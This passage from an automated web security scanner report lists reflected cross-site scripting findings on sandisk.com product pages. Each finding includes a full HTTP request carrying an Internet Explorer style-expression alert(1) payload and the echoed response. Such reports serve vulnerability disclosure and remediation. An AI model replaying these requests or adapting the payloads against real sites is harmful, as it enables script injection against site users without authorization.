<a class="ajaxLink" href="http://www.sandisk.com/products/dslr/sandisk-ultra-sdhc?417ed"style="x:expression(alert(1))"28642bf6833=1?tab=review">
...[SNIP]...

1.14. http://www.sandisk.com/products/dslr/sandisk-ultra-sdxc-cards [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/sandisk-ultra-sdxc-cards

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c301f"style%3d"x%3aexpression(alert(1))"2ab41aca7da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c301f"style="x:expression(alert(1))"2ab41aca7da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/dslr/sandisk-ultra-sdxc-cards?c301f"style%3d"x%3aexpression(alert(1))"2ab41aca7da=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26666
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/dslr/sandisk-ultra-sdxc-cards?c301f"style="x:expression(alert(1))"2ab41aca7da=1?tab=review">
...[SNIP]...

1.15. http://www.sandisk.com/products/gaming-cards/sandisk-gaming-compatibility-pack [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/gaming-cards/sandisk-gaming-compatibility-pack

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0cbd"style%3d"x%3aexpression(alert(1))"3ac5ff1664d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c0cbd"style="x:expression(alert(1))"3ac5ff1664d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/gaming-cards/sandisk-gaming-compatibility-pack?c0cbd"style%3d"x%3aexpression(alert(1))"3ac5ff1664d=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26255
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:44:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/gaming-cards/sandisk-gaming-compatibility-pack?c0cbd"style="x:expression(alert(1))"3ac5ff1664d=1?tab=review">
...[SNIP]...

1.16. http://www.sandisk.com/products/gaming-cards/sandisk-memory-stick-micro-m2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/gaming-cards/sandisk-memory-stick-micro-m2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b36"style%3d"x%3aexpression(alert(1))"f4d102a6648 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8b36"style="x:expression(alert(1))"f4d102a6648 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/gaming-cards/sandisk-memory-stick-micro-m2?f8b36"style%3d"x%3aexpression(alert(1))"f4d102a6648=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33763
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:45:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/gaming-cards/sandisk-memory-stick-micro-m2?f8b36"style="x:expression(alert(1))"f4d102a6648=1?tab=review">
...[SNIP]...

1.17. http://www.sandisk.com/products/gaming-cards/sandisk-xbox-360-usb-flash-drive [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/gaming-cards/sandisk-xbox-360-usb-flash-drive

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feae6"style%3d"x%3aexpression(alert(1))"d34acc7bf93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as feae6"style="x:expression(alert(1))"d34acc7bf93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/gaming-cards/sandisk-xbox-360-usb-flash-drive?feae6"style%3d"x%3aexpression(alert(1))"d34acc7bf93=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49552
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/gaming-cards/sandisk-xbox-360-usb-flash-drive?feae6"style="x:expression(alert(1))"d34acc7bf93=1?tab=review">
...[SNIP]...

1.18. http://www.sandisk.com/products/imaging/sandisk-extreme-sdhc-cards- [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/imaging/sandisk-extreme-sdhc-cards-

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80206"style%3d"x%3aexpression(alert(1))"ed3bde58f47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80206"style="x:expression(alert(1))"ed3bde58f47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/imaging/sandisk-extreme-sdhc-cards-?80206"style%3d"x%3aexpression(alert(1))"ed3bde58f47=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33480
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/imaging/sandisk-extreme-sdhc-cards-?80206"style="x:expression(alert(1))"ed3bde58f47=1?tab=review">
...[SNIP]...

1.19. http://www.sandisk.com/products/imaging/sandisk-ultra-memory-stick-pro-hg-duo [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/imaging/sandisk-ultra-memory-stick-pro-hg-duo

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69b7a"style%3d"x%3aexpression(alert(1))"a61104fe1c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69b7a"style="x:expression(alert(1))"a61104fe1c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/imaging/sandisk-ultra-memory-stick-pro-hg-duo?69b7a"style%3d"x%3aexpression(alert(1))"a61104fe1c0=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35816
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:44:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/imaging/sandisk-ultra-memory-stick-pro-hg-duo?69b7a"style="x:expression(alert(1))"a61104fe1c0=1?tab=review">
...[SNIP]...

1.20. http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/mobile-memory-products/sandisk-memory-stick-micro-m2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c726"style%3d"x%3aexpression(alert(1))"10b48f71d65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c726"style="x:expression(alert(1))"10b48f71d65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/mobile-memory-products/sandisk-memory-stick-micro-m2?2c726"style%3d"x%3aexpression(alert(1))"10b48f71d65=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33197
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2?2c726"style="x:expression(alert(1))"10b48f71d65=1?tab=review">
...[SNIP]...

1.21. http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 952bd"style%3d"x%3aexpression(alert(1))"d9ef4911efd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 952bd"style="x:expression(alert(1))"d9ef4911efd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx?952bd"style%3d"x%3aexpression(alert(1))"d9ef4911efd=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33207
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx?952bd"style="x:expression(alert(1))"d9ef4911efd=1?tab=review">
...[SNIP]...

1.22. http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/mobile-memory-products/sandisk-microsdhc

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5bed"style%3d"x%3aexpression(alert(1))"58b950f600b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5bed"style="x:expression(alert(1))"58b950f600b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/mobile-memory-products/sandisk-microsdhc?c5bed"style%3d"x%3aexpression(alert(1))"58b950f600b=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33104
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc?c5bed"style="x:expression(alert(1))"58b950f600b=1?tab=review">
...[SNIP]...

1.23. http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/mobile-memory-products/sandisk-microsdhc.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f99b"style%3d"x%3aexpression(alert(1))"f056f50e3ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7f99b"style="x:expression(alert(1))"f056f50e3ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/mobile-memory-products/sandisk-microsdhc.aspx?7f99b"style%3d"x%3aexpression(alert(1))"f056f50e3ad=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33114
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc.aspx?7f99b"style="x:expression(alert(1))"f056f50e3ad=1?tab=review">
...[SNIP]...

1.24. http://www.sandisk.com/products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52c2a"style%3d"x%3aexpression(alert(1))"d7e158940b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 52c2a"style="x:expression(alert(1))"d7e158940b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc?52c2a"style%3d"x%3aexpression(alert(1))"d7e158940b0=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30129
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc?52c2a"style="x:expression(alert(1))"d7e158940b0=1?tab=review">
...[SNIP]...

1.25. http://www.sandisk.com/products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b05e3"style%3d"x%3aexpression(alert(1))"9864d6d6b83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b05e3"style="x:expression(alert(1))"9864d6d6b83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx?b05e3"style%3d"x%3aexpression(alert(1))"9864d6d6b83=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26366
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx?b05e3"style="x:expression(alert(1))"9864d6d6b83=1?tab=review">
...[SNIP]...

1.26. http://www.sandisk.com/products/netbook-cards/sandisk-netbook-sdhc-memory-card [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/netbook-cards/sandisk-netbook-sdhc-memory-card

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6826b"style%3d"x%3aexpression(alert(1))"3306417ccb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6826b"style="x:expression(alert(1))"3306417ccb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/netbook-cards/sandisk-netbook-sdhc-memory-card?6826b"style%3d"x%3aexpression(alert(1))"3306417ccb9=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32328
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/netbook-cards/sandisk-netbook-sdhc-memory-card?6826b"style="x:expression(alert(1))"3306417ccb9=1?tab=review">
...[SNIP]...

1.27. http://www.sandisk.com/products/readers-accessories/large-memory-card-case [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/readers-accessories/large-memory-card-case

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2624e"style%3d"x%3aexpression(alert(1))"78a0d731df7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2624e"style="x:expression(alert(1))"78a0d731df7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/readers-accessories/large-memory-card-case?2624e"style%3d"x%3aexpression(alert(1))"78a0d731df7=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24292
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:44:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/readers-accessories/large-memory-card-case?2624e"style="x:expression(alert(1))"78a0d731df7=1?tab=review">
...[SNIP]...

1.28. http://www.sandisk.com/products/readers-accessories/micromate-sdhc [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/readers-accessories/micromate-sdhc

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91afa"style%3d"x%3aexpression(alert(1))"f06b3bb7095 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91afa"style="x:expression(alert(1))"f06b3bb7095 in the application's response.

